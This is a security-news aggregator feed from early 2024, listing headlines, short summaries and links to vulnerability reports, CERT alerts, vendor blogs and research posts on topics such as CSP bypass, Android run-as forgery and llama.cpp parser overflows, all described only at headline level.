2024-03-05T15:00:00Z | 1709650800

https://www.akamai.com/blog/security-research/2024/mar/netkiller-condi-botnet-exploits-camera
Using form hijacking to bypass CSP
2024-03-05T14:55:00Z | 1709650500

In this post we'll show you how to bypass CSP by using an often overlooked technique that can enable password theft in a seemingly secure configuration. What is form hijacking? Form hijacking isn't re

https://portswigger.net/research/using-form-hijacking-to-bypass-csp
Cryptographic design review of Ockam
2024-03-05T14:00:38Z | 1709647238

In October 2023, Ockam hired Trail of Bits to review the design of its product, a set of protocols that aims to enable secure communication (i.e., end-to-end encrypted and mutually authenticated channels) across various heterogeneous networks. A secure system starts at the design […]

https://blog.trailofbits.com/2024/03/05/cryptographic-design-review-of-ockam/
Navigating the Network: The Quest for Innocence in a World of Complexity
2024-03-05T14:00:00Z | 1709647200

Welcome to the digital age, where the marvels of self-driving cars and sophisticated AI like ChatGPT grace our everyday lives. Yet, amidst these advancements, a battleground often goes unnoticed, hidden within the layers of our network infrastructures. It's a world where network teams are the unsung heroes, tirelessly working behind the scenes to keep our digital lifelines seamless and uninterrupted. Today, I want to take you on a journey through Network Observability, a beacon of hope in the relentless quest to avoid outages, understand the impact of change, and quickly and accurately root cause complex situations.

https://blogs.arista.com/blog/network-observability
The National Cyber Security Centre Finland’s weekly review – 09/2024
2024-03-05T10:10:45Z | 1709633445

This week, we take a look at various types of recruitment scams and the dangers of malicious attachments.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-092024
The National Cyber Security Centre Finland’s weekly review – 09/2024
2024-03-05T10:10:45Z | 1709633445

This week, we take a look at various types of recruitment scams and the dangers of malicious attachments.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-092024
Radiflow Sees 45% Growth, Signalling Strong Market Expansion and Strategic Advancements
2024-03-05T09:48:31Z | 1709632111

The post Radiflow Sees 45% Growth, Signalling Strong Market Expansion and Strategic Advancements appeared first on Radiflow.

https://www.smartstateindia.com/radiflow-sees-45-percent-growth-signalling-strong-market-expansion-and-strategic-advancements/
Security Alert (A24-03-02): Multiple Vulnerabilities in Android
2024-03-05T04:00:00Z | 1709611200

Google has released Android Security Bulletin March 2024 to address multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
WANTED: Brilliant AI Experts Needed for Cyber Criminal Ring
2024-03-04T15:55:27Z | 1709567727

In a recent ad on a closed Telegram channel, a known threat actor has announced it’s recruiting AI and ML experts for the development of it’s own LLM product. Threat actors and cybercriminals have always been early adapters of new technology: from cryptocurrencies to anonymization tools to using the Internet itself. While cybercriminals were initially... The post WANTED: Brilliant AI Experts Needed for Cyber Criminal Ring appeared first on Cato Networks.

https://www.catonetworks.com/blog/wanted-brilliant-ai-and-experts-needed-for-cyber-criminal-ring/
Relishing new Fickling features for securing ML systems
2024-03-04T14:00:44Z | 1709560844

We’ve added new features to Fickling to offer enhanced threat detection and analysis across a broad spectrum of machine learning (ML) workflows. Fickling is a decompiler, static analyzer, and bytecode rewriter for the Python pickle module that can help you detect, analyze, or create malicious pickle files. While the ML community […]

https://blog.trailofbits.com/2024/03/04/relishing-new-fickling-features-for-securing-ml-systems/
6 Ways Akamai Innovates to Strengthen Their Leadership in Application Security
2024-03-04T14:00:00Z | 1709560800

https://www.akamai.com/blog/security/2024/feb/app-and-api-protector-strengthens-your-api-defenses
Bypassing the “run-as” debuggability check on Android via newline injection
2024-03-04T00:00:00Z | 1709510400

An attacker with ADB access to an Android device can trick the “run-as” tool into believing any app is debuggable. By doing so, they can read and write private data and invoke system APIs as if they were most apps on the system—including many privileged apps, but not ones that run as the system user. Furthermore, they can achieve persistent code execution as Google Mobile Services (GMS) or as apps that use its SDKs by altering executable code that GMS caches in its data directory.

https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html
Anatomy of a GreyNoise Tag
2024-03-04T00:00:00Z | 1709510400

This post explores the utility and methodology behind GreyNoise tags, emphasizing their role in analyzing network data from a non-IP-centric perspective to identify patterns, behaviors, and potential threats.

https://www.greynoise.io/blog/anatomy-of-a-greynoise-tag
Network Threats: A Step-by-step Attack Demonstration
2024-03-03T10:41:18Z | 1709462478

The post Network Threats: A Step-by-step Attack Demonstration appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-network-threats-attack-demonstration
How we applied advanced fuzzing techniques to cURL
2024-03-01T14:30:25Z | 1709303425

Near the end of 2022, Trail of Bits was hired by the Open Source Technology Improvement Fund (OSTIF) to perform a security assessment of the cURL file transfer command-line utility and its library, libcurl. The scope of our engagement included a code review, a threat model, and the subject of this blog […]

https://blog.trailofbits.com/2024/03/01/toward-more-effective-curl-fuzzing/
The Benefits of Microsegmentation for Compliance
2024-03-01T14:00:00Z | 1709301600

https://www.akamai.com/blog/security/2024/mar/the-benefits-of-microsegmentation-for-compliance
Address the Challenges of Compliance and Cybersecurity with Zero Trust
2024-03-01T14:00:00Z | 1709301600

The intersection of compliance and cybersecurity is an opportunity for your organization to adopt solutions that simultaneously solve challenges in both areas.

https://www.akamai.com/blog/security/2024/feb/address-challenges-compliance-cybersecurity-zero-trust
When try, try, try again leads to out-of-order execution bugs
2024-03-01T12:00:42Z | 1709294442

Have you ever wondered how a rollup and its base chain—the chain that the rollup commits state checkpoints to—communicate and interact? How can a user with funds only on the base chain interact with contracts on the rollup? In Arbitrum Nitro, one way to call a method on a contract deployed on […]

https://blog.trailofbits.com/2024/03/01/when-try-try-try-again-leads-to-out-of-order-execution-bugs/
When Patch Tuesday becomes Patch Monday – Friday
2024-03-01T12:00:00Z | 1709294400

If you’re an administrator running Ivanti VPN (Connect Secure and Policy Secure) appliances in your network, then the past two months have likely made you wish you weren’t.In a relatively short timeframe bad news kept piling up for Ivanti Connect Secure VPN customers, starting on Jan. 10th, 2024, when critical and high severity vulnerabilities, CVE-2024-21887... The post When Patch Tuesday becomes Patch Monday – Friday appeared first on Cato Networks.

https://www.catonetworks.com/blog/when-patch-tuesday-becomes-patch-monday-friday/
Security Alert (A24-03-01): Multiple Vulnerabilities in Microsoft Edge
2024-03-01T04:00:00Z | 1709265600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Noname Security Platform Updates: 3.27 Release
2024-03-01T03:19:00Z | 1709263140

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-327-release
Bluetooth Unleashed: Syncing Up with the RattaGATTa Series! Part 1
2024-03-01T00:00:00Z | 1709251200

This post introduces GreyNoise Labs' series on BTLE, highlighting its privacy and security implications, as well as the journey from basic usage to sophisticated system development, offering insights for cybersecurity professionals and tech enthusiasts alike.

https://www.greynoise.io/blog/bluetooth-unleashed-syncing-up-with-the-rattagatta-series-part-1
Empowering Educators in the Digital Classroom: The iboss Classroom Management Solution
2024-02-29T20:51:34Z | 1709239894

In today's rapidly evolving educational landscape, the integration of technology into classrooms has become an essential part of providing quality education. However, this integration comes with its own set of challenges, especially in terms of managing student engagement and ensuring a distraction-free learning environment. This is where iboss Classroom Management for Google Workspace steps in, offering a comprehensive solution that harmonizes with Google Classroom to transform the way educators manage digital learning spaces. The post Empowering Educators in the Digital Classroom: The iboss Classroom Management Solution appeared first on iboss.

https://www.iboss.com/blog/empowering-educators-in-the-digital-classroom/
Demystifying GenAI security, and how Cato helps you secure your organizations access to ChatGPT
2024-02-29T13:09:44Z | 1709212184

Over the past year, countless articles, predictions, prophecies and premonitions have been written about the risks of AI, with GenAI (Generative AI) and ChatGPT being in the center. Ranging from its ethics to far reaching societal and workforce implications (“No Mom, The Terminator isn’t becoming a reality… for now”).Cato security research and engineering was so... The post Demystifying GenAI security, and how Cato helps you secure your organizations access to ChatGPT appeared first on Cato Networks.

https://www.catonetworks.com/blog/demystifying-genai-security-and-how-cato-helps-you-secure-your-organizations-access-to-chatgpt/
Vulnerability in Laragon software
2024-02-29T07:00:00Z | 1709190000

RCE (Remote Code Execution) vulnerability has been found in the Laragon open source software (CVE-2024-0864).

https://cert.pl/en/posts/2024/02/CVE-2024-0864/
Security Alert (A24-02-17): Multiple Vulnerabilities in Google Chrome
2024-02-29T04:00:00Z | 1709179200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-02-18): Multiple Vulnerabilities in Cisco Products
2024-02-29T04:00:00Z | 1709179200

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA D3D10 Driver Shader Functionality out-of-bounds read vulnerability
2024-02-29T00:00:00Z | 1709164800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1849
Vectra ITDR finds identity attacks that other tools can’t, protect all of your accounts with less effort by John Mancini
2024-02-29T00:00:00Z | 1709164800

Identity is the center of the modern enterprise and the modern attack. Attackers abuse identities in the data center and the cloud to access sensitive data

https://www.vectra.ai/blog/vectra-itdr-finds-identity-attacks-that-other-tools-cant-protect-all-of-your-accounts-with-less-effort
Our response to the US Army’s RFI on developing AIBOM tools
2024-02-28T16:30:05Z | 1709137805

The US Army’s Program Executive Office for Intelligence, Electronic Warfare and Sensors (PEO IEW&S) recently issued a request for information (RFI) on methods to implement and automate production of an artificial intelligence bill of materials (AIBOM) as part of Project Linchpin. The RFI describes the AIBOM as a detailed […]

https://blog.trailofbits.com/2024/02/28/our-response-to-the-us-armys-rfi-on-developing-aibom-tools-2/
Cyber weather for January 2024
2024-02-28T13:14:54Z | 1709126094

The year 2024 started with rain in cyber weather. The first month of the year included both a spike in the number of notifications of Microsoft 365 account breaches as well as several critical vulnerabilities. Denial-of-service attacks done by hacktivists also continued during the start of the year.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_01/2024
Cyber weather for January 2024
2024-02-28T13:14:54Z | 1709126094

The year 2024 started with rain in cyber weather. The first month of the year included both a spike in the number of notifications of Microsoft 365 account breaches as well as several critical vulnerabilities. Denial-of-service attacks done by hacktivists also continued during the start of the year.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_01/2024
Fake Data Breaches: Why They Matter and 12 Ways to Deal with Them
2024-02-28T09:37:20Z | 1709113040

As a Chief Information Security Officer (CISO), you have the enormous responsibility to safeguard your organization’s data. If you’re like most CISOs, your worst fear is receiving a phone call in the middle of the night from one of your information security team members informing you that the company’s data is being sold on popular... The post Fake Data Breaches: Why They Matter and 12 Ways to Deal with Them appeared first on Cato Networks.

https://www.catonetworks.com/blog/fake-data-breaches-why-they-matter-and-12-ways-to-deal-with-them/
Security Alert (A24-02-16): Vulnerability in VMware Products
2024-02-28T04:00:00Z | 1709092800

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Google Chrome Video Encoder Metrics denial of service vulnerability
2024-02-28T00:00:00Z | 1709078400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1870
Detect and Hunt Living off the Land Techniques with Vectra AI by Vectra AI Product Team
2024-02-28T00:00:00Z | 1709078400

Enhance your security with detailed logging, behavioral baselines, and AI-driven prioritization for effective LOTL defense.

https://www.vectra.ai/blog/detect-and-hunt-living-off-the-land-techniques-with-vectra-ai
Is Network Security Still a Thing in the Age of Public Cloud?
2024-02-27T14:00:00Z | 1709042400

Akamai Guardicore Segmentation is extending its segmentation capabilities to hybrid cloud environments.

https://www.akamai.com/blog/security/2024/feb/network-security-age-public-cloud
The National Cyber Security Centre Finland’s weekly review – 08/2024
2024-02-27T11:18:26Z | 1709032706

This week, we talk about a wave of compromised email accounts and attempts of CEO fraud and scams online using the names of the parcel and travel service company Matkahuolto and the Finnish postal service Posti.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-082024
The National Cyber Security Centre Finland’s weekly review – 08/2024
2024-02-27T11:18:26Z | 1709032706

This week, we talk about a wave of compromised email accounts and attempts of CEO fraud and scams online using the names of the parcel and travel service company Matkahuolto and the Finnish postal service Posti.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-082024
What We're Reading: February 2024
2024-02-27T00:00:00Z | 1708992000

Welcome to our Monthly Roundup, where we curate a unique mix of articles, books, podcasts, and more that have captured the attention of the GreyNoise team. From deeply technical articles to literary treasures, join us on this eclectic journey through the media that sparks our curiosity each month. Explore + discover as we share the gems that have fueled our inspiration!

https://www.greynoise.io/blog/what-were-reading-february-2024-2
Circomspect has been integrated into the Sindri CLI
2024-02-26T14:00:02Z | 1708956002

Our tool Circomspect is now integrated into the Sindri command-line interface (CLI)! We designed Circomspect to help developers build Circom circuits more securely, particularly given the limited tooling support available for this novel programming framework. Integrating this tool into a development environment like that provided by Sindri is a significant step toward […]

https://blog.trailofbits.com/2024/02/26/circomspect-has-been-integrated-into-the-sindri-cli/
Keep Your Tech Flame Alive: Akamai Trailblazer ? Richa Dayal
2024-02-26T14:00:00Z | 1708956000

https://www.akamai.com/blog/culture/2024/feb/keep-your-tech-flame-alive-akamai-trailblazer-richa-dayal
The Platform Matters, Not the Platformization
2024-02-26T13:39:47Z | 1708954787

Cyber security investors, vendors and the press are abuzz with a new concept introduced by Palo Alto Networks (PANW) in their recent earnings announcement and guidance cut: Platformization. PANW rightly wants to address the “point solutions fatigue” experienced by enterprises due to the “point solution for point problem” mentality that has been prevalent in cyber... The post The Platform Matters, Not the Platformization   appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-platform-matters-not-the-platformization/
Learning from the LockBit Takedown
2024-02-26T12:30:00Z | 1708950600

https://www.akamai.com/blog/security/2024/feb/learning-from-the-lockbit-takedown
Security Alert (A24-02-15): Multiple Vulnerabilities in Microsoft Edge
2024-02-26T04:00:00Z | 1708920000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
llama.cpp GGUF library info->ne heap-based buffer overflow vulnerability
2024-02-26T00:00:00Z | 1708905600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1914
llama.cpp GGUF library GGUF_TYPE_ARRAY/GGUF_TYPE_STRING parsing heap-based buffer overflow vulnerability
2024-02-26T00:00:00Z | 1708905600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1912
llama.cpp GGUF library header.n_kv heap-based buffer overflow vulnerability
2024-02-26T00:00:00Z | 1708905600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1916
llama.cpp GGUF library header.n_tensors heap-based buffer overflow vulnerability
2024-02-26T00:00:00Z | 1708905600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1915
llama.cpp GGUF library gguf_fread_str heap-based buffer overflow vulnerability
2024-02-26T00:00:00Z | 1708905600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1913
Continuously fuzzing Python C extensions
2024-02-23T14:30:03Z | 1708698603

Deserializing, decoding, and processing untrusted input are telltale signs that your project would benefit from fuzzing. Yes, even Python projects. Fuzzing helps reduce bugs in high-assurance software developed in all programming languages. Fortunately for the Python ecosystem, Google has released Atheris, a coverage-guided fuzzer for both pure Python code and Python C […]

https://blog.trailofbits.com/2024/02/23/continuously-fuzzing-python-c-extensions/
Advocating for Inclusion in Tech
2024-02-23T14:00:00Z | 1708696800

https://www.akamai.com/blog/culture/2024/feb/advocating-for-inclusion-in-tech
Cyber security governance: the role of the board
2024-02-23T12:05:48Z | 1708689948

As cyber threats evolve, boards must remain vigilant in cyber security governance.

https://www.ncsc.gov.uk/blog-post/cyber-security-governance-the-role-of-the-board
SMA100 MFA Improper Access Control Vulnerability
2024-02-23T03:41:27Z | 1708659687

Improper access control vulnerability has been identified in the SMA100 SSL-VPN virtual office portal, which in specific conditions could potentially enable a remote authenticated attacker to associate another user's MFA mobile application.There is no evidence that these vulnerabilities are being exploited in the wild. SonicWall strongly advises SMA 100 series product users, which include SMA 200, 210, 400, 410, and 500v products to upgrade to the mentioned fixed release version. CVE: CVE-2024-22395 Last updated: Feb. 23, 2024, 3:41 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0001
Cato XDR – Industry’s First Converged SASE & XDR Solution
2024-02-22T18:26:33Z | 1708626393

The post Cato XDR – Industry’s First Converged SASE & XDR Solution appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-industrys-first-converged-sase-and-xdr
Exploitation Observed: Ivanti Connect Secure ? CVE-2023-46805 and CVE-2024-21887
2024-02-21T15:00:00Z | 1708527600

https://www.akamai.com/blog/security-research/2024/feb/ivanti-january-rce-cve-zero-day-exploitation-observed
Radiflow upgrades, integrates OT Cybersecurity and Risk Management solution ahead of NIS2 directive
2024-02-21T14:14:33Z | 1708524873

The post Radiflow upgrades, integrates OT Cybersecurity and Risk Management solution ahead of NIS2 directive appeared first on Radiflow.

https://industrialcyber.co/news/radiflow-upgrades-integrates-ot-cybersecurity-and-risk-management-solution-ahead-of-nis2-directive/
Data Matters ? Empowering Threat Hunters to Reduce API Risk
2024-02-21T14:00:00Z | 1708524000

https://www.akamai.com/blog/security/2024/feb/data-matters-empowering-threat-hunters-to-reduce-api-risk
The National Cyber Security Centre Finland’s weekly review – 07/2024
2024-02-21T12:33:05Z | 1708518785

This week, our topics include vulnerabilities, ongoing phishing campaigns and how the Finnish presidential election went in terms of cyber security.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-072024
The National Cyber Security Centre Finland’s weekly review – 07/2024
2024-02-21T12:33:05Z | 1708518785

This week, our topics include vulnerabilities, ongoing phishing campaigns and how the Finnish presidential election went in terms of cyber security.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-072024
Security Alert (A24-02-13): Multiple Vulnerabilities in Google Chrome
2024-02-21T04:00:00Z | 1708488000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-02-14): Multiple Vulnerabilities in Firefox
2024-02-21T04:00:00Z | 1708488000

Mozilla has published the advisories (MFSA2024-05 and MFSA2024-06) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Practical Vulnerability Archaeology Starring Ivanti's CVE-2021-44529
2024-02-21T00:00:00Z | 1708473600

In 2021, Ivanti patched a vulnerability that they called “code injection”. Rumors say it was a backdoor in an open source project. Let’s find out what actually happened!

https://www.greynoise.io/blog/practical-vulnerability-archaeology-starring-ivantis-cve-2021-44529
NCSC statement on law enforcement's disruption of LockBit ransomware operation
2024-02-20T14:46:24Z | 1708440384

The National Crime Agency (NCA) has announced that it is conducting a months-long campaign with international partners to disrupt the threat posed by the LockBit ransomware operation.

https://www.ncsc.gov.uk/news/ncsc-statement-on-law-enforcement-disruption-of-lockbit-ransomware-operation
Breaking the shared key in threshold signature schemes
2024-02-20T14:30:37Z | 1708439437

Today we are disclosing a denial-of-service vulnerability that affects the Pedersen distributed key generation (DKG) phase of a number of threshold signature scheme implementations based on the Frost, DMZ21, GG20, and GG18 protocols. The vulnerability allows a single malicious participant to surreptitiously raise the threshold required to reconstruct the shared key, which […]

https://blog.trailofbits.com/2024/02/20/breaking-the-shared-key-in-threshold-signature-schemes/
SS8 Networks Announces ISO 27001 Accreditation
2024-02-20T14:26:55Z | 1708439215

Recognizes Company’s Dedication to Information Security, Cybersecurity, and Privacy Protection MILPITAS, Calif. – February 20, 2024 – SS8 Networks, a leader in Lawful and Location Intelligence and Monitoring Suite platforms, today announced it has achieved ISO/IEC 27001:2022 certification, an international standard in recognition of SS8 Networks’ commitment to the highest standard of information security management. […] The post SS8 Networks Announces ISO 27001 Accreditation appeared first on SS8.

https://www.ss8.com/ss8-announces-iso-27001-accreditation/
RIA peadirektoriks saab Joonas Heiter
2024-02-20T11:17:25Z | 1708427845

Majandus- ja infotehnoloogiaminister Tiit Riisalo kinnitas riigikantselei tippjuhtide valikukomisjoni ettepanekul Riigi Infosüsteemi Ameti (RIA) uueks peadirektoriks Joonas Heiteri.

https://ria.ee/uudised/ria-peadirektoriks-saab-joonas-heiter
Riigiportaal eesti.ee täienes keskse volituste haldamise teenusega
2024-02-20T11:12:22Z | 1708427542

Riigiportaal eesti.ee läks üle uuele kesksele volituste haldamise infosüsteemile Pääsuke, mis muudab ettevõtte esindajatele erinevate ametiasutuste iseteeninduskeskkondadesse juurdepääsude andmise mugavamaks.

https://ria.ee/uudised/riigiportaal-eestiee-taienes-keskse-volituste-haldamise-teenusega
Text message scams done by criminals are becoming more difficult - more than 70 sender IDs are already protected
2024-02-20T08:17:38Z | 1708417058

The work done by the Finnish Transport and Communications Agency Traficom and operators to prevent text message scams is bearing fruit. So far, different organisations have already protected over 70 SMS Sender IDs. Traficom also encourages other organisations that send text messages to check their security needs and register the necessary IDs in Traficom’s service.

https://traficom.fi/en/news/text-message-scams-done-criminals-are-becoming-more-difficult-more-70-sender-ids-are-already
Text message scams done by criminals are becoming more difficult - more than 70 sender IDs are already protected
2024-02-20T08:17:38Z | 1708417058

The work done by the Finnish Transport and Communications Agency Traficom and operators to prevent text message scams is bearing fruit. So far, different organisations have already protected over 70 SMS Sender IDs. Traficom also encourages other organisations that send text messages to check their security needs and register the necessary IDs in Traficom’s service.

https://traficom.fi/en/news/text-message-scams-done-criminals-are-becoming-more-difficult-more-70-sender-ids-are-already
Weston Embedded uC-HTTP HTTP Server heap-based buffer overflow vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1843
The Biosig Project libbiosig sopen_FAMOS_read integer overflow to out-of-bounds write vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1921
Weston Embedded uC-TCP-IP IP header loopback parsing double-free vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1829
The Biosig Project libbiosig .egi parsing heap-based buffer overflow vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1920
Weston Embedded uC-TCP-IP ICMP/ICMPv6 parsing denial of service vulnerabilities
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1828
The Biosig Project libbiosig sopen_FAMOS_read use-after-free vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1923
The Biosig Project libbiosig sopen_FAMOS_read integer underflow to out-of-bounds write vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1922
Imaging Data Commons libdicom DICOM File Meta Information Parsing Use-After-Free vulnerabilities
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931
The Biosig Project libbiosig BrainVision Header Parsing double-free vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1917
The Biosig Project libbiosig sopen_FAMOS_read NULL calloc out-of-bounds write vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1925
The Biosig Project libbiosig BrainVisionMarker Parsing Out-of-bounds Write vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1918
The Biosig Project libbiosig BrainVision ASCII Header Parsing double-free vulnerability
2024-02-20T00:00:00Z | 1708387200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1919
FIRST POST: Jan-Mar 2024
2024-02-20T00:00:00Z | 1708387200

Message from the Chair; Christmas CTF in Norway; Incentivizing anti-abuse proactivity among online service providers; FIRST Newcomers & Membership Committee; Growth Stack Media Appointed as FIRST's Agency of Record; On the Road to Fukuoka - Registration is Open!; FIRST Standards Committee update (aka “the wheel reinvention prevention committee”); Special Interest Group Updates; FIRST on Social Media; Upcoming Events

https://www.first.org/newsroom/post/202401
Vectra AI Platform Extends Detection and Response Capabilities to IaaS (AWS, GCP, and Microsoft Azure) by Nicole Drake
2024-02-20T00:00:00Z | 1708387200

Vectra NDR enabled by Gigamon for unified observability into evolving hybrid cloud threats, from the network to the cloud.

https://www.vectra.ai/blog/vectra-ai-platform-extends-detection-and-response-capabilities-for-cloud
Top 10 web hacking techniques of 2023
2024-02-19T14:31:12Z | 1708353072

Welcome to the Top 10 Web Hacking Techniques of 2023, the 17th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

https://portswigger.net/research/top-10-web-hacking-techniques-of-2023
12º Fórum Brasileiro de CSIRTs e 5º Workshop MISP
2024-02-16T18:15:00Z | 1708107300

O 12º Fórum de CSIRTs e o 5º Workshop MISP ocorrerão de 29 a 31 de julho de 2024. Estão abertas as chamadas de palestras para os dois eventos: 12º Fórum de CSIRTs 5º Workshop MISP Mais informações em: https://forum.cert.br/

https://forum.cert.br/
Akamai?s Perspective on February?s Patch Tuesday 2024
2024-02-16T15:00:00Z | 1708095600

https://www.akamai.com/blog/security-research/2024/feb/akamai-perspective-patch-tuesday-february-2024
A few notes on AWS Nitro Enclaves: Images and attestation
2024-02-16T14:30:32Z | 1708093832

AWS Nitro Enclaves are locked-down virtual machines with support for attestation. They are Trusted Execution Environments (TEEs), similar to Intel SGX, making them useful for running highly security-critical code. However, the AWS Nitro Enclaves platform lacks thorough documentation and mature tooling. So we decided to do some deep research into it […]

https://blog.trailofbits.com/2024/02/16/a-few-notes-on-aws-nitro-enclaves-images-and-attestation/
Will VPN Security Vulnerabilities Accelerate ZTNA Adoption?
2024-02-15T14:00:00Z | 1708005600

https://www.akamai.com/blog/security/2024/feb/will-vpn-security-vulnerabilities-accelerate-ztna-adoption
CloudFactory Eliminates “Head Scratching” with Cato XDR
2024-02-15T12:53:04Z | 1708001584

More than just introducing XDR today, Cato announced the first XDR solution to be built on a SASE platform. Tapping the power of the platform dramatically improves XDR’s quality of insight and the ease of incident response, leading to faster incident remediation. “The Cato platform gives us peace of mind,” says Shayne Green, an early... The post CloudFactory Eliminates “Head Scratching” with Cato XDR appeared first on Cato Networks.

https://www.catonetworks.com/blog/cloudfactory-eliminates-head-scratching-with-cato-xdr/
Vulnerabilities in Comarch ERP XL software
2024-02-15T11:00:00Z | 1707994800

CERT Poland has received a report about three vulnerabilities (CVE-2023-4537, CVE-2023-4538, CVE-2023-4539) found in Comarch ERP XL software.

https://cert.pl/en/posts/2024/02/CVE-2023-4537/
Vulnerability in iZZi connect application
2024-02-15T09:00:00Z | 1707987600

CERT Poland has received a report about using hard-coded credentials in iZZi connect application and assigned it the number CVE-2024-0390.

https://cert.pl/en/posts/2024/02/CVE-2024-0390/
CVE-2023-50387 and CVE-2023-50868 ? DNS Exploit KeyTrap Posed Major Internet Threat
2024-02-15T07:00:00Z | 1707980400

https://www.akamai.com/blog/security/2024/feb/dns-exploit-keytrap-posed-major-internet-threat
High Threat Security Alert (A24-02-12): Multiple Vulnerabilities in Zoom Products
2024-02-15T04:00:00Z | 1707969600

Zoom has published a security advisory to address multiple vulnerabilities in Zoom products.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader Font CPAL numColorRecords out-of-bounds read vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1905
Adobe Acrobat Reader FileAttachment PDAnnot destroy use-after-free vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1901
Adobe Acrobat Reader Font CPAL integer overflow vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1906
Adobe Acrobat Reader Annot3D object zoom event use-after-free vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1890
Adobe Acrobat Reader Font CharStrings INDEX out-of-bounds read vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1908
Adobe Acrobat Reader Font avar SegmentMaps out-of-bounds read vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1909
Adobe Acrobat Reader Font CharStrings CharStringsOffset out-of-bounds read vulnerability
2024-02-15T00:00:00Z | 1707955200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1910
Tackling Today's Cybersecurity Challenges with Vectra MXDR: A Holistic Approach for Hybrid Environments by Gary Ruiz
2024-02-15T00:00:00Z | 1707955200

Today’s cybersecurity challenges are rooted in the evolving hybrid environment of organizations and struggle to recruit and retain talent. Learn how Vectra MXDR answers these challenges.

https://www.vectra.ai/blog/tackling-todays-cybersecurity-challenges-with-vectra-mxdr-a-holistic-approach-for-hybrid-environments
Cloud cryptography demystified: Amazon Web Services
2024-02-14T14:00:06Z | 1707919206

This post, part of a series on cryptography in the cloud, provides an overview of the cloud cryptography services offered within Amazon Web Services (AWS): when to use them, when not to use them, and important usage considerations. Stay tuned for future posts covering other cloud services. At Trail of Bits, we […]

https://blog.trailofbits.com/2024/02/14/cloud-cryptography-demystified-amazon-web-services/
What?s Next for Akamai?s Cloud Computing Strategy
2024-02-14T14:00:00Z | 1707919200

https://www.akamai.com/blog/cloud/2024/feb/whats-next-for-akamais-cloud-computing-strategy
The National Cyber Security Centre Finland’s weekly review – 06/2024
2024-02-14T11:36:51Z | 1707910611

This week, we talk about bank credential phishing themed around MyKanta and Suomi.fi and denial-of-service attacks that have occurred at the start of the year, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-062024
The National Cyber Security Centre Finland’s weekly review – 06/2024
2024-02-14T11:36:51Z | 1707910611

This week, we talk about bank credential phishing themed around MyKanta and Suomi.fi and denial-of-service attacks that have occurred at the start of the year, among other topics.

